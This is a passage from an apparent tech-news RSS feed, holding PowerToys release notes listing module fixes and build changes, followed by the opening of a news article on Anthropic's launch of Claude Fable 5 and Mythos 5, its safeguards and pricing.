<p>Updated developer documentation with steps for debugging Command Palette directly through its Visual Studio solution filter in <a href="https://github.com/microsoft/PowerToys/pull/48108" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48108/hovercard">#48108</a> by <a href="https://github.com/Morma016">@Morma016</a></p>
</li>
<li>
<p>Added Command Palette Remote Desktop support for connecting to arbitrary hostnames typed into the list page, in addition to discovered connections in <a href="https://github.com/microsoft/PowerToys/pull/48069" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48069/hovercard">#48069</a> by <a href="https://github.com/michaeljolley">@michaeljolley</a></p>
</li>
<li>
<p>Improved Command Palette result scoring by synchronising fallback title and subtitle formatting so similar items rank consistently in <a href="https://github.com/microsoft/PowerToys/pull/48085" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48085/hovercard">#48085</a> by <a href="https://github.com/michaeljolley">@michaeljolley</a></p>
</li>
<li>
<p>Added a Command Palette "Show details" / "Hide details" toggle (with an icon) to the context menu, replacing the previous separate entries in <a href="https://github.com/microsoft/PowerToys/pull/48140" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48140/hovercard">#48140</a> by <a href="https://github.com/chatasweetie">@chatasweetie</a></p>
</li>
</ul>
<h3>FancyZones</h3>
<ul>
<li>Added translator-comment guidance to the FancyZones Editor strings 'Space around zones' and 'Highlight distance' so localizers translate them as margin/padding and adjacent-zone detection distance, fixing misleading Japanese renderings in <a href="https://github.com/microsoft/PowerToys/pull/47226" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47226/hovercard">#47226</a></li>
</ul>
<h3>File Explorer</h3>
<ul>
<li>Fixed a Markdown preview crash on UTF-8 files (notably CJK content) that exceeded WebView2's NavigateToString byte limit by switching the size check to count UTF-8 bytes and falling back to the temp-file rendering path when the threshold is exceeded in <a href="https://github.com/microsoft/PowerToys/pull/47391" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47391/hovercard">#47391</a></li>
</ul>
<h3>File Locksmith</h3>
<ul>
<li>Fixed File Locksmith handling of Unicode file paths when passing paths between normal and elevated runs, preventing certain non-ASCII paths from being corrupted in <a href="https://github.com/microsoft/PowerToys/pull/47361" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47361/hovercard">#47361</a></li>
</ul>
<h3>Grab And Move</h3>
<ul>
<li>
<p>Fixed the LNK2038 C++/WinRT version mismatch breaking GrabAndMove on CI by adding the Microsoft.Windows.CppWinRT NuGet to GrabAndMove.vcxproj so it uses the repo-pinned CppWinRT instead of whatever the Windows SDK ships in <a href="https://github.com/microsoft/PowerToys/pull/47910" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47910/hovercard">#47910</a></p>
</li>
<li>
<p>Removed the "NEW" tag from the Grab And Move entry in Settings now that the module has shipped through a full release in <a href="https://github.com/microsoft/PowerToys/pull/48174" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48174/hovercard">#48174</a> by <a href="https://github.com/moooyo">@moooyo</a></p>
</li>
</ul>
<h3>Image Resizer</h3>
<ul>
<li>Added live settings reload to Image Resizer so external changes to settings.json take effect immediately without relaunching the flow in <a href="https://github.com/microsoft/PowerToys/pull/45266" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/45266/hovercard">#45266</a> by <a href="https://github.com/daverayment">@daverayment</a></li>
<li>Improved Image Resizer accessibility so Narrator announces the Resize button by name and the window title now reads 'Image Resizer' instead of the generic 'WinUI Desktop' in <a href="https://github.com/microsoft/PowerToys/pull/47752" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47752/hovercard">#47752</a></li>
</ul>
<h3>Keyboard Manager</h3>
<ul>
<li>Enabled the redesigned Keyboard Manager editor by default, so new installations open the WinUI 3 editor without changing settings in <a href="https://github.com/microsoft/PowerToys/pull/48245" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48245/hovercard">#48245</a></li>
</ul>
<h3>Mouse Without Borders</h3>
<ul>
<li>Added Mouse Without Borders Refresh Connections to Quick Access and the Settings Dashboard so users can reconnect devices faster in <a href="https://github.com/microsoft/PowerToys/pull/46025" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/46025/hovercard">#46025</a></li>
<li>Refactored Mouse Without Borders logging cleanup with no intended user-facing behavior change in <a href="https://github.com/microsoft/PowerToys/pull/44553" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/44553/hovercard">#44553</a> by <a href="https://github.com/mikeclayton">@mikeclayton</a></li>
</ul>
<h3>Peek</h3>
<ul>
<li>Added a 'Show file preview tooltip' toggle to Peek's Behavior settings so users can disable the on-hover metadata tooltip (filename, type, date modified, size), and fixed the binding so toggling off no longer leaves an empty popup attached in <a href="https://github.com/microsoft/PowerToys/pull/46624" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/46624/hovercard">#46624</a></li>
</ul>
<h3>PowerDisplay</h3>
<ul>
<li>
<p>Improved Power Display by automatically disabling the feature after a detected DDC/CI capability crash and showing a Settings warning before users re-enable it in <a href="https://github.com/microsoft/PowerToys/pull/47734" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47734/hovercard">#47734</a></p>
</li>
<li>
<p>Fixed Power Display flyout keyboard handling so pressing Escape closes the window in <a href="https://github.com/microsoft/PowerToys/pull/48026" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48026/hovercard">#48026</a></p>
</li>
<li>
<p>Improved Power Display monitor detection by rescanning displays when the screen wakes and temporarily locking controls until the refresh completes in <a href="https://github.com/microsoft/PowerToys/pull/47876" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47876/hovercard">#47876</a></p>
</li>
<li>
<p>Updated PowerToys documentation to include telemetry events for Grab And Move and Power Display in <a href="https://github.com/microsoft/PowerToys/pull/47228" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47228/hovercard">#47228</a></p>
</li>
<li>
<p>Updated Power Display localization comments so the product name remains untranslated in UI strings, including the system tray tooltip in <a href="https://github.com/microsoft/PowerToys/pull/47351" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47351/hovercard">#47351</a></p>
</li>
<li>
<p>Improved Power Display monitor discovery by distinguishing internal panels from external monitors before applying brightness controls, reducing unnecessary DDC/CI probing on built-in displays in <a href="https://github.com/microsoft/PowerToys/pull/47740" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47740/hovercard">#47740</a></p>
</li>
<li>
<p>Fixed Power Display upgrades so existing per-monitor preferences are carried forward from older monitor IDs to the current stable IDs in <a href="https://github.com/microsoft/PowerToys/pull/47977" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47977/hovercard">#47977</a></p>
</li>
<li>
<p>Added a Power Display Max compatibility mode setting that can find monitors skipped by standard DDC discovery, with an immediate rescan and warning in Settings when enabled in <a href="https://github.com/microsoft/PowerToys/pull/47875" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47875/hovercard">#47875</a></p>
</li>
<li>
<p>Improved Power Display brightness, contrast, and volume sliders by committing changes after a short debounce and allowing mouse-wheel adjustments in <a href="https://github.com/microsoft/PowerToys/pull/47756" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47756/hovercard">#47756</a></p>
</li>
<li>
<p>Fixed Power Display brightness, contrast, and volume controls on monitors whose native DDC/CI ranges are not 0-100 by scaling slider percentages correctly in <a href="https://github.com/microsoft/PowerToys/pull/47679" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47679/hovercard">#47679</a></p>
</li>
<li>
<p>Added a Power Display Settings confirmation prompt before enabling the module and improved monitor diagnostics for troubleshooting in <a href="https://github.com/microsoft/PowerToys/pull/48111" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48111/hovercard">#48111</a></p>
</li>
<li>
<p>Fixed Power Display per-monitor settings so toggles persist across restarts, monitor reordering, and transient discovery failures in <a href="https://github.com/microsoft/PowerToys/pull/47712" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47712/hovercard">#47712</a></p>
</li>
<li>
<p>Added a built-in Power Display monitor blacklist so known problematic displays are skipped during DDC/CI discovery and reported in logs instead of being probed in <a href="https://github.com/microsoft/PowerToys/pull/48051" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48051/hovercard">#48051</a></p>
</li>
<li>
<p>Fixed a Power Display false-positive crash detection when the host process exits cooperatively, so the safety lockout no longer triggers on clean shutdowns in <a href="https://github.com/microsoft/PowerToys/pull/48173" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48173/hovercard">#48173</a> by <a href="https://github.com/moooyo">@moooyo</a></p>
</li>
<li>
<p>Removed the "NEW" tag from the Power Display entry in Settings now that the module has shipped through a full release in <a href="https://github.com/microsoft/PowerToys/pull/48174" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48174/hovercard">#48174</a> by <a href="https://github.com/moooyo">@moooyo</a></p>
</li>
<li>
<p>Reworked the Power Display warning dialog with clearer messaging, distinct warning kinds, and a dedicated dialog view-model so users get more actionable guidance after a DDC/CI issue in <a href="https://github.com/microsoft/PowerToys/pull/48249" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48249/hovercard">#48249</a></p>
</li>
</ul>
<h3>PowerToys Run</h3>
<ul>
<li>Improved PowerToys Run Calculator to return a friendly error for expressions whose result is a complex number (e.g. <code>sqrt(-1)</code>) instead of throwing during decimal conversion in <a href="https://github.com/microsoft/PowerToys/pull/47506" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47506/hovercard">#47506</a> by <a href="https://github.com/MardSilva">@MardSilva</a></li>
<li>Documented the third-party PowerToys Run plugin <strong>Community.PowerToys.Run.Plugin.DiskAnalyzer</strong> for scanning folders/drives to find the largest files and folders in <a href="https://github.com/microsoft/PowerToys/pull/48106" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48106/hovercard">#48106</a> by <a href="https://github.com/thetsaw">@thetsaw</a></li>
</ul>
<h3>Quick Accent</h3>
<ul>
<li>Updated Quick Accent’s popup UI to standard PowerToys styling while keeping the accent selector experience unchanged in <a href="https://github.com/microsoft/PowerToys/pull/46604" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/46604/hovercard">#46604</a></li>
<li>Improved Quick Accent language selection consistency by sharing the same language list between the accent popup and Settings UI in <a href="https://github.com/microsoft/PowerToys/pull/47211" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47211/hovercard">#47211</a> by <a href="https://github.com/daverayment">@daverayment</a></li>
<li>Added Greek Polytonic as a Quick Accent language, making polytonic Greek characters available from matching letter keys and Settings in <a href="https://github.com/microsoft/PowerToys/pull/47021" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47021/hovercard">#47021</a> by <a href="https://github.com/daverayment">@daverayment</a> and <a href="https://github.com/guidotorresmx">@guidotorresmx</a></li>
<li>Fixed Quick Accent popup sizing, positioning, and selection glitches on high-DPI or multi-monitor setups, and improved Shift-key detection for navigation in <a href="https://github.com/microsoft/PowerToys/pull/46593" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/46593/hovercard">#46593</a> by <a href="https://github.com/daverayment">@daverayment</a></li>
</ul>
<h3>Settings</h3>
<ul>
<li>
<p>Added Image Resizer size preset validation so empty or whitespace names are ignored, keeping presets named and easier to understand in <a href="https://github.com/microsoft/PowerToys/pull/45425" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/45425/hovercard">#45425</a></p>
</li>
<li>
<p>Fixed the Settings UI resource list by removing a duplicate Quick Accent Greek Polytonic language entry, allowing Settings builds to complete cleanly in <a href="https://github.com/microsoft/PowerToys/pull/48054" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48054/hovercard">#48054</a></p>
</li>
<li>
<p>Improved Settings UI with refreshed PowerToys imagery, constrained OOBE/SCOOBE layouts, and cleaner General settings controls and icons in <a href="https://github.com/microsoft/PowerToys/pull/48024" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48024/hovercard">#48024</a></p>
</li>
<li>
<p>Fixed the Settings “No shortcuts to show” empty-state message so it displays with a single period in <a href="https://github.com/microsoft/PowerToys/pull/47287" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47287/hovercard">#47287</a> by <a href="https://github.com/daverayment">@daverayment</a></p>
</li>
<li>
<p>Updated Grab And Move settings localization guidance so the Korean translation for “Activation modifier key” uses the feature activation meaning instead of product activation wording in <a href="https://github.com/microsoft/PowerToys/pull/47352" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47352/hovercard">#47352</a></p>
</li>
<li>
<p>Fixed the Quick Access flyout shortcut editor so clicking Reset no longer crashes PowerToys Settings and leaves the shortcut empty cleanly in <a href="https://github.com/microsoft/PowerToys/pull/47407" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47407/hovercard">#47407</a></p>
</li>
<li>
<p>Fixed PowerToys auto-update so it now actually relaunches after install with a 'successfully updated' toast, backs up all JSON configs before updating with restore on detected corruption, and defaults AutoDownloadUpdates to true for fresh installs in <a href="https://github.com/microsoft/PowerToys/pull/46889" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/46889/hovercard">#46889</a></p>
</li>
<li>
<p>Renamed the OOBE overview "Learn" link label to "Documentation" so the call-to-action is clearer to first-time users in <a href="https://github.com/microsoft/PowerToys/pull/48155" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48155/hovercard">#48155</a></p>
</li>
</ul>
<h3>Shortcut Guide</h3>
<ul>
<li>
<p>Fixed Shortcut Guide key visuals to show readable key names instead of raw numeric key codes, while preserving arrow key glyph behavior in <a href="https://github.com/microsoft/PowerToys/pull/48037" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48037/hovercard">#48037</a> by <a href="https://github.com/noraa-junker">@noraa-junker</a></p>
</li>
<li>
<p>Improved Shortcut Guide V2 reliability and accuracy by showing the configured shortcut, including additional PowerToys module shortcuts, matching app manifests correctly, and exiting cleanly from Esc or the close button in <a href="https://github.com/microsoft/PowerToys/pull/48043" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48043/hovercard">#48043</a> by <a href="https://github.com/noraa-junker">@noraa-junker</a></p>
</li>
<li>
<p>Added Shortcut Guide V2, a redesigned shortcut reference with built-in manifests for Windows, PowerToys, and common apps, plus taskbar/context-aware navigation and updated Settings, OOBE, docs, and installer support in <a href="https://github.com/microsoft/PowerToys/pull/40834" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/40834/hovercard">#40834</a> by <a href="https://github.com/noraa-junker">@noraa-junker</a></p>
</li>
<li>
<p>Renamed the Settings UI module label from "Shortcut Guide V2" to "Shortcut Guide" now that V2 is the only shipping version in <a href="https://github.com/microsoft/PowerToys/pull/48151" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48151/hovercard">#48151</a></p>
</li>
<li>
<p>Fixed a Shortcut Guide V2 crash that occurred when the per-app Manifests directory was missing or unreadable, by treating the directory as empty in that case in <a href="https://github.com/microsoft/PowerToys/pull/48171" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48171/hovercard">#48171</a> by <a href="https://github.com/MuyuanMS">@MuyuanMS</a></p>
</li>
<li>
<p>Reworded the Shortcut Guide module and OOBE descriptions so they better explain what V2 does and how to invoke it in <a href="https://github.com/microsoft/PowerToys/pull/48248" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48248/hovercard">#48248</a></p>
</li>
</ul>
<h3>Workspaces</h3>
<ul>
<li>Reworked the Workspaces editor with WPF Fluent theming (dropping ControlzEx and ModernWpf), refined fonts, spacing, and Mica background, and moved action buttons to the top with full-width scrolling in <a href="https://github.com/microsoft/PowerToys/pull/46172" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/46172/hovercard">#46172</a> by <a href="https://github.com/Jay-o-Way">@Jay-o-Way</a></li>
</ul>
<h3>ZoomIt</h3>
<ul>
<li>Removed a stale Microsoft.Windows.ImplementationLibrary NuGet import from ZoomItBreak.vcxproj that was unused but broke the official build after the .NET 10 upgrade bumped the sibling project's WIL version in <a href="https://github.com/microsoft/PowerToys/pull/47649" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47649/hovercard">#47649</a></li>
<li>Added webcam capture overlay and multi-clip append-with-transitions support to the ZoomIt recording/trim editor, exposed the new options in the ZoomIt Settings page, and fixed microphone/webcam selection-dialog bugs along the way in <a href="https://github.com/microsoft/PowerToys/pull/47529" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47529/hovercard">#47529</a> by <a href="https://github.com/foxmsft">@foxmsft</a> and <a href="https://github.com/markrussinovich">@markrussinovich</a></li>
<li>Fixed ZoomIt's record-hotkey registration so when Alt is the only modifier the window-record hotkey (base XOR Alt) is no longer registered as a modifier-less key that had been hijacking every bare keypress in <a href="https://github.com/microsoft/PowerToys/pull/47388" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47388/hovercard">#47388</a></li>
<li>Exposed ZoomIt's 16:9 aspect-ratio toggle for the screen-region recording hotkey (default Ctrl+Shift+5) in the PowerToys Settings UI in <a href="https://github.com/microsoft/PowerToys/pull/47695" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47695/hovercard">#47695</a> by <a href="https://github.com/foxmsft">@foxmsft</a></li>
</ul>
<h3>Development</h3>
<ul>
<li>Build / dependency improvements:
<ul>
<li>Updated PowerToys build and developer tooling to .NET 10, with Visual Studio 2026 now required for building from source in <a href="https://github.com/microsoft/PowerToys/pull/41280" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/41280/hovercard">#41280</a> by <a href="https://github.com/jerone">@jerone</a> and <a href="https://github.com/snickler">@snickler</a></li>
<li>Fixed Shortcut Guide v2 release signing by adding the YamlDotNet dependency to the signed binaries list in <a href="https://github.com/microsoft/PowerToys/pull/48050" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48050/hovercard">#48050</a></li>
<li>Updated shared PowerToys .NET runtime and library packages from 10.0.7 to 10.0.8 for the latest servicing fixes in <a href="https://github.com/microsoft/PowerToys/pull/48010" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48010/hovercard">#48010</a> by <a href="https://github.com/snickler">@snickler</a></li>
<li>Improved PowerToys build tooling so build scripts discover Visual Studio 2026 Insiders/Preview installations with C++ tools and skip unusable installs in <a href="https://github.com/microsoft/PowerToys/pull/47462" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47462/hovercard">#47462</a></li>
<li>Updated PowerToys WinUI platform dependencies, including Windows App SDK 2.0.1 and WebView2, for apps and the Command Palette extension template in <a href="https://github.com/microsoft/PowerToys/pull/47470" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47470/hovercard">#47470</a></li>
<li>Updated shared PowerToys .NET runtime and library packages from 10.0.6 to 10.0.7 for the latest servicing fixes in <a href="https://github.com/microsoft/PowerToys/pull/47517" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47517/hovercard">#47517</a> by <a href="https://github.com/snickler">@snickler</a></li>
<li>Fixed Quick Accent release signing by adding PowerAccent.Common.dll to the signed binaries list in <a href="https://github.com/microsoft/PowerToys/pull/48058" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48058/hovercard">#48058</a></li>
<li>Fixed Advanced Paste release signing by adding the Google Gemini-related dependency DLLs to the signed binaries list in <a href="https://github.com/microsoft/PowerToys/pull/48001" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48001/hovercard">#48001</a></li>
<li>Updated Advanced Paste AI dependencies, including Semantic Kernel and provider connectors, to newer package versions in <a href="https://github.com/microsoft/PowerToys/pull/47819" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47819/hovercard">#47819</a></li>
</ul>
</li>
<li>CI &amp; automation:
<ul>
<li>Added a Telemetry PR Check workflow that detects telemetry event changes in pull requests and posts contributor guidance in <a href="https://github.com/microsoft/PowerToys/pull/47889" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47889/hovercard">#47889</a></li>
<li>Updated GitHub issue triage automation by renaming the area-labeling workflow and removing the legacy product auto-label workflow in <a href="https://github.com/microsoft/PowerToys/pull/47911" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47911/hovercard">#47911</a></li>
<li>Added GitHub issue triage automation that applies Product/Area labels to new or reopened issues and supports manual backfill in <a href="https://github.com/microsoft/PowerToys/pull/47808" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47808/hovercard">#47808</a></li>
<li>Fixed GitHub issue auto-labeling by correcting Product label names so the workflow applies existing repository labels in <a href="https://github.com/microsoft/PowerToys/pull/48027" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48027/hovercard">#48027</a></li>
<li>Added a GitHub Action and tester for issue triage that applies Product labels from issue template areas, with AI fallback and manual modes in <a href="https://github.com/microsoft/PowerToys/pull/47485" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47485/hovercard">#47485</a></li>
<li>Fixed GitHub issue auto-labeling so the workflow can authenticate with GitHub Models and apply area labels again in <a href="https://github.com/microsoft/PowerToys/pull/47820" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47820/hovercard">#47820</a></li>
<li>Updated spell-check CI expectations by removing obsolete tokens, reducing noisy advisory comments on pull requests in <a href="https://github.com/microsoft/PowerToys/pull/48110" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48110/hovercard">#48110</a></li>
<li>Updated CI to skip automatic builds for draft pull requests until they are ready for review in <a href="https://github.com/microsoft/PowerToys/pull/47442" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47442/hovercard">#47442</a></li>
<li>Fixed the README roadmap reference for v0.100 so it renders as a clickable milestone link in <a href="https://github.com/microsoft/PowerToys/pull/47785" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47785/hovercard">#47785</a></li>
<li>Updated README download guidance to point users to release assets and changes the release notes link to the releases page in <a href="https://github.com/microsoft/PowerToys/pull/47432" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47432/hovercard">#47432</a></li>
<li>Updated the GitHub issue tracker duplicate-resolution reply to more clearly point users to the original tracking issue in <a href="https://github.com/microsoft/PowerToys/pull/47981" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47981/hovercard">#47981</a></li>
</ul>
</li>
<li>Setup / installer:
<ul>
<li>Shrunk the PowerToys installer by removing genuinely-unused dependencies (System.Data.SqlClient, MFC/AMP/OpenMP VC++ runtime DLLs) and deduplicating WinAppSDK files between the install root and WinUI3Apps subfolder, reducing download size by roughly 11 MB in <a href="https://github.com/microsoft/PowerToys/pull/47233" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47233/hovercard">#47233</a></li>
</ul>
</li>
<li>Enterprise / GPO:
<ul>
<li>Bumped the en-US ADML revision to 1.20 to match the ADMX file, fixing a Group Policy Editor load error that prevented administrators from loading the PowerToys policy templates in <a href="https://github.com/microsoft/PowerToys/pull/47672" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47672/hovercard">#47672</a></li>
<li>Migrated spdlog from a git submodule to <strong>vcpkg manifest mode</strong> with an overlay port pinned to the same upstream commit (<code>gabime/spdlog@616866fc</code>), replacing the polyfill shim and removing the in-tree <code>src/logging/</code> wrapper in <a href="https://github.com/microsoft/PowerToys/pull/48039" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48039/hovercard">#48039</a></li>
<li>Removed the last git submodule (<code>deps/expected-lite</code>) since the code path that used it had already been switched to <code>std::expected</code>, leaving PowerToys fully submodule-free in <a href="https://github.com/microsoft/PowerToys/pull/48159" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48159/hovercard">#48159</a> by <a href="https://github.com/DHowett">@DHowett</a></li>
<li>Fixed a grammar typo in the PowerToy project-template README, changing "Settings Informations" to "Settings Information" in <a href="https://github.com/microsoft/PowerToys/pull/48148" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48148/hovercard">#48148</a> by <a href="https://github.com/P-r-e-m-i-u-m">@P-r-e-m-i-u-m</a></li>
<li>Moved the Command Palette API spec back into <code>src/modules/cmdpal/doc/</code> so the spec lives alongside the generated API code that consumes it in <a href="https://github.com/microsoft/PowerToys/pull/48160" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48160/hovercard">#48160</a></li>
</ul>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic brings Mythos to the masses with Claude Fable 5, its most powerful generally available model ever]]></title>
<description><![CDATA[Anthropic today launched two new AI models — Claude Fable 5 and Claude Mythos 5 — marking the company’s first broad release of the powerful “Mythos-class” AI capabilities it previously made available only to participating organizations in its restricted cybersecurity program, Project Glasswing, w...]]></description>
<link>https://tsecurity.de/de/3585604/it-nachrichten/anthropic-brings-mythos-to-the-masses-with-claude-fable-5-its-most-powerful-generally-available-model-ever/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585604/it-nachrichten/anthropic-brings-mythos-to-the-masses-with-claude-fable-5-its-most-powerful-generally-available-model-ever/</guid>
<pubDate>Tue, 09 Jun 2026 20:32:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Anthropic today <a href="https://www.anthropic.com/news/claude-fable-5-mythos-5">launched two new AI models </a>— Claude Fable 5 and Claude Mythos 5 — marking the company’s first broad release of the powerful “Mythos-class” AI capabilities it previously made available only to participating organizations in its restricted cybersecurity program, <a href="https://venturebeat.com/technology/anthropic-says-its-most-powerful-ai-cyber-model-is-too-dangerous-to-release">Project Glasswing</a>, which it announced two months ago.</p><p>The company says Fable 5, which is the version most users and developers will get starting today, exceeds every Claude model it has previously made generally available — featuring stronger performance across software engineering, knowledge work, vision, scientific research and long-running tasks. </p><p>It smashes the existing benchmarks and comes atop on nearly all of them, though the prior Claude Mythos Preview version of the model still takes the top spots on computer use and multidisciplinary reasoning (see benchmark chart below and <a href="https://www.anthropic.com/news/claude-fable-5-mythos-5">here</a>). </p><p>The new Claude Mythos 5, by contrast, is a more restricted, upgraded version of the prior, similarly restricted Mythos Preview model. As such, it has certain safeguards lifted for approved users, including Anthropic's cybersecurity partners in its Project Glasswing effort, and select biology researchers. </p><p>The key difference is that the general purpose Fable 5 wraps the same underlying Mythos-class capability in new safeguards. Anthropic says requests involving certain high-risk areas — including cybersecurity, biology and chemistry, and model distillation — are automatically routed to <a href="https://venturebeat.com/technology/anthropics-claude-opus-4-8-is-here-with-3x-cheaper-fast-mode-and-near-mythos-level-alignment">Claude Opus 4.8,</a> Anthropic's previously flagship general model, instead, with users notified when that happens. </p><p>The company says more than 95% of Fable sessions run entirely on Fable’s own responses, with no fallback, and that internal and external red-teaming efforts found no “universal jailbreaks” after more than 1,000 hours of testing.</p><p>Anthropic says Fable 5 is available to the general public today through its website, apps, and <a href="https://platform.claude.com/docs/en/about-claude/models/overview">API</a>, but that Mythos 5 will initially only be made available to users who already have access to the older Claude Mythos Preview.</p><h2><b>Pricing, access and a tricky rollout</b></h2><p>Anthropic is pricing both Fable 5 and Mythos 5 at $10 per million input tokens and $50 per million output tokens. The company says that is less than half the price of Claude Mythos Preview, but still ranks as the most expensive of major AI models available globally. </p><h1><b>VentureBeat Frontier AI Model API Pricing Snapshot</b></h1><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Input</b></p></td><td><p><b>Output</b></p></td><td><p><b>Total Cost</b></p></td><td><p><b>Source</b></p></td></tr><tr><td><p>MiMo-V2.5 Flash</p></td><td><p>$0.10</p></td><td><p>$0.30</p></td><td><p>$0.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi MiMo</a></p></td></tr><tr><td><p>deepseek-v4-flash</p></td><td><p>$0.14</p></td><td><p>$0.28</p></td><td><p>$0.42</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>deepseek-v4-pro</p></td><td><p>$0.435</p></td><td><p>$0.87</p></td><td><p>$1.305</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>MiniMax-M3</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://platform.minimax.io/subscribe/token-plan?tab=api-enterprise">MiniMax</a></p></td></tr><tr><td><p>Gemini 3.1 Flash-Lite</p></td><td><p>$0.25</p></td><td><p>$1.50</p></td><td><p>$1.75</p></td><td><p><a 